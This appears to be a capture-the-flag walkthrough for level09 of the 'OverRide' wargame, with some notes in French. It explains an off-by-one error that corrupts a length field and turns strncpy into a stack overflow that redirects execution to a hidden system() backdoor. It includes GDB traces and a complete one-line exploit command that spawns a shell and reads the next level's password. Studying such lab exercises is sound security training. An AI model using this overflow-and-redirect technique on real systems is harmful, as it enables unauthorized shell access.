# Level09 — Walkthrough

## Overview

The `level09` binary reads a username and a message, storing them in a stack-allocated structure. An **off-by-one error** in `set_username` lets us overwrite the least significant byte of a length field, which controls how many bytes `strncpy` copies in `set_msg`. This gives us a **stack buffer overflow** that overwrites the saved return address (RIP). A hidden function `secret_backdoor` (which calls `fgets` + `system`) provides a convenient target — no shellcode or ROP chain needed.

---

## Step 1: Run the binary and observe its behavior

```
level09@OverRide:~$ ./level09
--------------------------------------------
|   ~Welcome to l33t-m$n ~    v1337        |
--------------------------------------------
>: Enter your username
>>: hello
>: Welcome, hello>: Msg @Unix-Dude
>>: test
>: Msg sent!
```

The program reads a username, then a message, and exits normally.

---

## Step 2: Analyze the binary protections

```
level09@OverRide:~$ checksec ./level09
```

| Protection | Status | Impact |
|-----------|--------|--------|
| **Canary** | Disabled | No stack canary — overflow is not detected |
| **NX** | Enabled | Stack is not executable — no shellcode on stack |
| **PIE** | Enabled | Binary base address is randomized (but ASLR is off on the VM) |
| **Partial RELRO** | Yes | GOT is writable but not needed for this exploit |

---

## Step 3: Reconstruct the object layout

From the disassembly (`Ressources/disassembly.md`), `handle_msg` allocates `0xc0` bytes on the stack:

```asm
sub $0xc0, %rsp
```

The structure layout is:

| Offset | Size | Field |
|--------|------|-------|
| `0x00` — `0x8b` | 140 bytes | `msg` (destination for `strncpy`) |
| `0x8c` — `0xb3` | 40 bytes | `username` (copied byte-by-byte) |
| `0xb4` — `0xb7` | 4 bytes | `msg_len` (controls `strncpy` size) |
| `0xb8` — `0xbf` | 8 bytes | padding |
| `0xc0` — `0xc7` | 8 bytes | saved RBP |
| `0xc8` — `0xcf` | 8 bytes | **saved RIP** (return address) |

---

## Step 4: Identify the vulnerability

### The off-by-one in `set_username`

```asm
cmpl $0x28, -0x4(%rbp)     ; compare i with 40
jg   <exit_loop>            ; exit if i > 40
```

The loop condition is `i <= 0x28` (i.e., `i <= 40`), which means it iterates for `i = 0, 1, ..., 40` — that's **41 iterations**. But `username` only has 40 bytes (indices 0–39). The 41st byte (index 40) is written at `obj + 0x8c + 40 = obj + 0xb4`, which is the **first byte of `msg_len`**.

### Why the 41st byte matters

In little-endian, the first byte of a 32-bit integer is its **least significant byte (LSB)**. The initial value of `msg_len` is `0x8c` (140). If we write `0xff` as the 41st byte of the username, `msg_len` becomes `0x000000ff` = **255**.

### The overflow chain

With `msg_len = 255`, `strncpy(obj, msgbuf, 255)` copies up to 255 bytes starting at `obj + 0x00`. Since the saved RIP is at offset `0xc8` (200 bytes from the start), we can reach and overwrite it with a message of 200+ bytes.

---

## Step 5: Discover `secret_backdoor`

Looking at the disassembly, there is a function never called in the normal flow:

```asm
000000000000088c <secret_backdoor>:
    ; fgets(buf, 128, stdin)   → reads a command from stdin
    ; system(buf)              → executes it
    ; ret
```

This function reads a line from stdin and passes it to `system()`. If we redirect RIP here, we just need to send `/bin/sh` as the next line of input to get a shell.

---

## Step 6: Compute the target address

The binary is **PIE** (Position Independent Executable), so the offset of `secret_backdoor` is `0x88c` relative to the binary base.

On the OverRide VM (ASLR disabled), the PIE base is `0x555555554000`:

```
(gdb) break main
(gdb) run

Breakpoint 1, 0x000055555555488c in main ()

(gdb) info proc mappings
process 3210
Mapped address spaces:

    Start Addr           End Addr       Size     Offset objfile
0x555555554000     0x555555555000     0x1000        0x0 /home/users/level09/level09
0x555555755000     0x555555756000     0x1000        0x0 /home/users/level09/level09
0x555555756000     0x555555757000     0x1000     0x1000 /home/users/level09/level09
0x7ffff7a15000     0x7ffff7bcf000   0x1ba000        0x0 /lib/x86_64-linux-gnu/libc-2.15.so
...
```

La première ligne avec l'offset `0x0` et le binaire `level09` donne la PIE base : **`0x555555554000`**.

```
target = 0x555555554000 + 0x88c = 0x55555555488c
```

In little-endian: `\x8c\x48\x55\x55\x55\x55\x00\x00`

The two trailing `\x00` bytes are not a problem: `strncpy` copies the 6 useful bytes (positions 200–205) before encountering the NUL, and the high bytes of the saved RIP are already zero on the stack.

---

## Step 7: Build the payload

The exploit sends 3 lines to stdin:

| Line | Content | Size | Purpose |
|------|---------|------|---------|
| **1** (username) | `"A" * 40` + `\xff` | 41 bytes | Fill username + off-by-one: overwrites LSB of `msg_len` → 255 |
| **2** (message) | `"A" * 200` + `\x8c\x48\x55\x55\x55\x55` | 206 bytes | 200 bytes padding (covers `msg` + `username` + `msg_len` + padding + saved RBP) + address of `secret_backdoor` on saved RIP |
| **3** (command) | `/bin/sh` | 7 bytes | Read by `fgets` inside `secret_backdoor`, passed to `system()` → shell |

### Why 200 bytes of padding?

- `msg` = 140 bytes (0x00–0x8b)
- `username` = 40 bytes (0x8c–0xb3)
- `msg_len` = 4 bytes (0xb4–0xb7)
- padding = 8 bytes (0xb8–0xbf)
- saved RBP = 8 bytes (0xc0–0xc7)
- **Total before saved RIP = 200 bytes**

### Vérification de l'off-by-one dans GDB

On confirme que le 41e octet du username écrase bien `msg_len` :

```
(gdb) b *0x0000555555554910                  ← callq set_username (dans handle_msg)
(gdb) run
>: Enter your username
>>: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff

(gdb) b *0x000055555555491f                  ← callq set_msg (juste après set_username)
(gdb) continue

Breakpoint 2, 0x000055555555491f in handle_msg ()

(gdb) x/wx $rbp-0xc                         ← msg_len (offset 0xb4 dans la structure)
0x7fffffffe4f4: 0x000000ff                   ← msg_len = 255 (au lieu de 0x8c = 140)
```

`msg_len` est passé de `0x8c` (140) à `0xff` (255) grâce au 41e octet `\xff`.

### Vérification du padding (200 bytes) au moment du ret

```
(gdb) b *0x0000555555554931                  ← retq de handle_msg
(gdb) continue
>: Msg @Unix-Dude
>>: AAAA...  (200 'A' + adresse)

Breakpoint 3, 0x0000555555554931 in handle_msg ()

(gdb) x/2gx $rsp                            ← saved RIP est au sommet de la stack au ret
0x7fffffffe508: 0x000055555555488c 0x...     ← RIP = secret_backdoor ✓
```

Le saved RIP est bien écrasé par `0x55555555488c` (adresse de `secret_backdoor`).

---

## Step 8: Execute the exploit

```bash
( python -c 'import struct,sys;sys.stdout.write("A"*40+"\xff"+"\n"+"A"*200+struct.pack("<Q",0x55555555488c)+"\n"+"/bin/sh\n")' ; cat ) | ./level09
```

### What happens step by step:

1. `set_username` copies 41 bytes → the 41st (`\xff`) overwrites the LSB of `msg_len` → `msg_len = 255`
2. `set_msg` calls `strncpy(obj, msgbuf, 255)` → copies 206 bytes: 200 padding + 6 bytes of address overwriting saved RIP
3. `handle_msg` executes `leave ; ret` → RIP = `0x55555555488c` → jumps to `secret_backdoor`
4. `secret_backdoor` calls `fgets` → reads `/bin/sh` (line 3) → `system("/bin/sh")` → shell
5. `; cat` keeps stdin open to interact with the shell

---

## Step 9: Get the flag

```
$ whoami
end
$ cat /home/users/end/.pass
```

---

## If the PIE base differs

On some VMs, the PIE base may vary. Check in GDB:

```
(gdb) break main
(gdb) run
(gdb) info proc mappings
```

Find the `level09` line with `r-xp` permissions. The start address is the PIE base. Add `0x88c` to get the runtime address of `secret_backdoor`.

---

## Final exploit command

```bash
( python -c 'import struct,sys;sys.stdout.write("A"*40+"\xff"+"\n"+"A"*200+struct.pack("<Q",0x55555555488c)+"\n"+"/bin/sh\n")' ; cat ) | ./level09
```

---

## Key concepts

| Concept | Role in the exploit |
|---|---|
| **Off-by-one error** | The loop condition `i <= 40` writes 41 bytes into a 40-byte buffer, corrupting the adjacent `msg_len` field |
| **Structure layout** | Understanding the exact offsets between `username`, `msg_len`, and saved RIP is critical for the payload |
| **Little-endian** | The 41st byte overwrites the LSB of `msg_len`; the 8-byte address must be packed in LE order |
| **strncpy with corrupted length** | The corrupted `msg_len` (255 instead of 140) allows `strncpy` to overflow past the structure into the stack frame |
| **Hidden function** | `secret_backdoor` provides `fgets` + `system()` — a convenient target that avoids the need for shellcode or ROP |
| **PIE binary** | The binary's base address must be known to compute `secret_backdoor`'s runtime address; ASLR off on the VM makes this deterministic |
| **NX protection** | Stack is not executable, but we don't need shellcode — we redirect to an existing function |
